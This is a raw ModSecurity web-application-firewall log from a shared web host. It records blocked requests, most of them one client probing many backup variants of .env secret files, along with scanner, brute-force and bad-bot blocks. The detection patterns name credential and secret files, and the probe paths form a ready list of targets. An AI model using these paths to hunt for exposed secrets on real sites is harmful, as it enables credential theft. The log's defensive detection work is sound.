[Tue May 26 13:27:14.886977 2026] [security2:error] [pid 512745:tid 512972] [client 5.255.118.168:36670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahVSWnKSB_s2CvZg7xNiQAAAAWs"]
[Tue May 26 13:27:16.872692 2026] [security2:error] [pid 512745:tid 512940] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSXHKSB_s2CvZg7xNiYgAAAUs"]
[Tue May 26 13:27:17.197904 2026] [security2:error] [pid 512745:tid 512887] [client 188.132.150.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSXXKSB_s2CvZg7xNibQAAARY"]
[Tue May 26 13:27:17.236856 2026] [security2:error] [pid 512344:tid 512555] [client 5.255.118.168:36642] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.copy"] [unique_id "ahVSXcbElyei4S77DQf7pAAAAFE"]
[Tue May 26 13:27:17.975522 2026] [security2:error] [pid 512745:tid 512900] [client 14.176.160.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSXXKSB_s2CvZg7xNidgAAASM"]
[Tue May 26 13:27:18.190104 2026] [security2:error] [pid 512344:tid 512516] [client 5.255.118.168:36982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env~"] [unique_id "ahVSXsbElyei4S77DQf7tAAAACo"]
[Tue May 26 13:27:18.190284 2026] [security2:error] [pid 512344:tid 512585] [client 5.255.118.168:37024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.old"] [unique_id "ahVSXsbElyei4S77DQf7tQAAAG8"]
[Tue May 26 13:27:18.190944 2026] [security2:error] [pid 512745:tid 512924] [client 5.255.118.168:37080] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.bak"] [unique_id "ahVSXnKSB_s2CvZg7xNihAAAATs"]
[Tue May 26 13:27:18.190949 2026] [security2:error] [pid 512745:tid 512906] [client 5.255.118.168:36950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahVSXnKSB_s2CvZg7xNigwAAASk"]
[Tue May 26 13:27:18.191415 2026] [security2:error] [pid 512745:tid 512990] [client 5.255.118.168:36996] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.orig"] [unique_id "ahVSXnKSB_s2CvZg7xNigQAAAX0"]
[Tue May 26 13:27:18.191718 2026] [security2:error] [pid 512745:tid 512917] [client 5.255.118.168:37036] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.backup"] [unique_id "ahVSXnKSB_s2CvZg7xNihQAAATQ"]
[Tue May 26 13:27:18.191855 2026] [security2:error] [pid 512344:tid 512516] [client 5.255.118.168:37070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.swp"] [unique_id "ahVSXsbElyei4S77DQf7tgAAACo"]
[Tue May 26 13:27:18.193481 2026] [security2:error] [pid 512344:tid 512600] [client 5.255.118.168:37104] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.backup"] [unique_id "ahVSXsbElyei4S77DQf7uAAAAH4"]
[Tue May 26 13:27:18.193479 2026] [security2:error] [pid 512344:tid 512571] [client 5.255.118.168:37072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.orig"] [unique_id "ahVSXsbElyei4S77DQf7twAAAGE"]
[Tue May 26 13:27:18.194034 2026] [security2:error] [pid 512344:tid 512530] [client 5.255.118.168:36958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.swp"] [unique_id "ahVSXsbElyei4S77DQf7uwAAADg"]
[Tue May 26 13:27:18.194081 2026] [security2:error] [pid 512344:tid 512516] [client 5.255.118.168:37144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.orig"] [unique_id "ahVSXsbElyei4S77DQf7vQAAACo"]
[Tue May 26 13:27:18.194161 2026] [security2:error] [pid 512344:tid 512514] [client 5.255.118.168:37128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.swp"] [unique_id "ahVSXsbElyei4S77DQf7vAAAACg"]
[Tue May 26 13:27:18.194172 2026] [security2:error] [pid 512344:tid 512588] [client 5.255.118.168:37122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production~"] [unique_id "ahVSXsbElyei4S77DQf7vgAAAHI"]
[Tue May 26 13:27:18.194484 2026] [security2:error] [pid 512745:tid 512950] [client 5.255.118.168:37090] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.production.old"] [unique_id "ahVSXnKSB_s2CvZg7xNiiQAAAVU"]
[Tue May 26 13:27:18.194647 2026] [security2:error] [pid 512745:tid 512924] [client 5.255.118.168:37016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.copy"] [unique_id "ahVSXnKSB_s2CvZg7xNihwAAATs"]
[Tue May 26 13:27:18.194825 2026] [security2:error] [pid 512344:tid 512559] [client 5.255.118.168:37010] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.copy"] [unique_id "ahVSXsbElyei4S77DQf7vwAAAFU"]
[Tue May 26 13:27:18.194864 2026] [security2:error] [pid 512745:tid 512990] [client 5.255.118.168:36942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahVSXnKSB_s2CvZg7xNiigAAAX0"]
[Tue May 26 13:27:18.195105 2026] [security2:error] [pid 512344:tid 512596] [client 5.255.118.168:36962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahVSXsbElyei4S77DQf7ugAAAHo"]
[Tue May 26 13:27:18.195132 2026] [security2:error] [pid 512344:tid 512570] [client 5.255.118.168:36988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local.bak"] [unique_id "ahVSXsbElyei4S77DQf7wAAAAGA"]
[Tue May 26 13:27:18.196329 2026] [security2:error] [pid 512745:tid 512943] [client 5.255.118.168:37064] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.jailanitradingcompany.com"] [uri "/___proxy_subdomain_webdisk/.env.local~"] [unique_id "ahVSXnKSB_s2CvZg7xNiiwAAAU4"]
[Tue May 26 13:27:18.846141 2026] [security2:error] [pid 512745:tid 512807] [remote 74.7.241.58:33634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVSXnKSB_s2CvZg7xNilQABfj0"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:27:19.442137 2026] [security2:error] [pid 512745:tid 512901] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSX3KSB_s2CvZg7xNimAAAASQ"]
[Tue May 26 13:27:20.684316 2026] [security2:error] [pid 512344:tid 512581] [client 163.61.128.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVSYMbElyei4S77DQf76AAAAGs"]
[Tue May 26 13:27:20.939990 2026] [security2:error] [pid 512745:tid 512830] [remote 167.99.5.1:56356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.5.99.167.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVSYHKSB_s2CvZg7xNiqwABC1Q"]
[Tue May 26 13:27:21.468880 2026] [security2:error] [pid 512745:tid 512941] [client 185.191.171.7:32368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVSYXKSB_s2CvZg7xNitAAAAUw"]
[Tue May 26 13:27:21.469000 2026] [security2:error] [pid 512745:tid 512941] [client 185.191.171.7:32368] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVSYXKSB_s2CvZg7xNitAAAAUw"]
[Tue May 26 13:27:21.925236 2026] [security2:error] [pid 512344:tid 512530] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSYcbElyei4S77DQf7_QAAADg"]
[Tue May 26 13:27:22.076213 2026] [security2:error] [pid 512745:tid 512892] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSYXKSB_s2CvZg7xNitwAAARs"]
[Tue May 26 13:27:22.139987 2026] [security2:error] [pid 512344:tid 512538] [client 2401:4900:3761:a340:28f1:ce6d:12f7:1d40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVSYMbElyei4S77DQf77gAAQFo"], referer: https://kingsclub.in/indoor-party-hall/
[Tue May 26 13:27:22.163893 2026] [security2:error] [pid 512745:tid 512892] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSYXKSB_s2CvZg7xNitwAAARs"]
[Tue May 26 13:27:22.310967 2026] [security2:error] [pid 512745:tid 512963] [client 60.52.41.82:60314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 82.41.52.60.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVSYnKSB_s2CvZg7xNivgAAAWI"]
[Tue May 26 13:27:22.311079 2026] [security2:error] [pid 512745:tid 512963] [client 60.52.41.82:60314] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVSYnKSB_s2CvZg7xNivgAAAWI"]
[Tue May 26 13:27:22.954939 2026] [security2:error] [pid 512745:tid 512951] [client 4.201.75.230:13900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.samayikprasanga.in"] [uri "/inputs.php"] [unique_id "ahVSYnKSB_s2CvZg7xNiygAAAVY"]
[Tue May 26 13:27:23.035524 2026] [security2:error] [pid 512745:tid 512973] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSYnKSB_s2CvZg7xNixQAAAWw"]
[Tue May 26 13:27:23.109305 2026] [security2:error] [pid 512745:tid 512973] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSYnKSB_s2CvZg7xNixQAAAWw"]
[Tue May 26 13:27:24.002095 2026] [security2:error] [pid 512745:tid 512978] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSY3KSB_s2CvZg7xNi1gAAAXE"]
[Tue May 26 13:27:24.080752 2026] [security2:error] [pid 512745:tid 512978] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSY3KSB_s2CvZg7xNi1gAAAXE"]
[Tue May 26 13:27:24.123951 2026] [security2:error] [pid 512745:tid 512916] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSY3KSB_s2CvZg7xNi1QAAATM"]
[Tue May 26 13:27:24.969415 2026] [security2:error] [pid 512745:tid 512923] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZHKSB_s2CvZg7xNi5gAAATo"]
[Tue May 26 13:27:25.049966 2026] [security2:error] [pid 512745:tid 512923] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZHKSB_s2CvZg7xNi5gAAATo"]
[Tue May 26 13:27:25.948293 2026] [security2:error] [pid 512745:tid 512969] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZXKSB_s2CvZg7xNi7wAAAWg"]
[Tue May 26 13:27:26.026697 2026] [security2:error] [pid 512745:tid 512969] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZXKSB_s2CvZg7xNi7wAAAWg"]
[Tue May 26 13:27:26.078748 2026] [security2:error] [pid 512745:tid 512900] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSZXKSB_s2CvZg7xNi7QAAASM"]
[Tue May 26 13:27:26.901244 2026] [security2:error] [pid 512745:tid 512990] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZnKSB_s2CvZg7xNi9QAAAX0"]
[Tue May 26 13:27:26.983578 2026] [security2:error] [pid 512745:tid 512990] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZnKSB_s2CvZg7xNi9QAAAX0"]
[Tue May 26 13:27:27.853780 2026] [security2:error] [pid 512745:tid 512987] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSZ3KSB_s2CvZg7xNi_gAAAXo"]
[Tue May 26 13:27:27.893834 2026] [security2:error] [pid 512344:tid 512504] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVSZ8bElyei4S77DQf8WAAAAB4"]
[Tue May 26 13:27:27.930874 2026] [security2:error] [pid 512745:tid 512987] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSZ3KSB_s2CvZg7xNi_gAAAXo"]
[Tue May 26 13:27:28.806010 2026] [security2:error] [pid 512745:tid 512918] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahVSaHKSB_s2CvZg7xNjBQAAATU"]
[Tue May 26 13:27:28.886325 2026] [security2:error] [pid 512745:tid 512918] [client 180.191.120.95:35906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVSaHKSB_s2CvZg7xNjBQAAATU"]
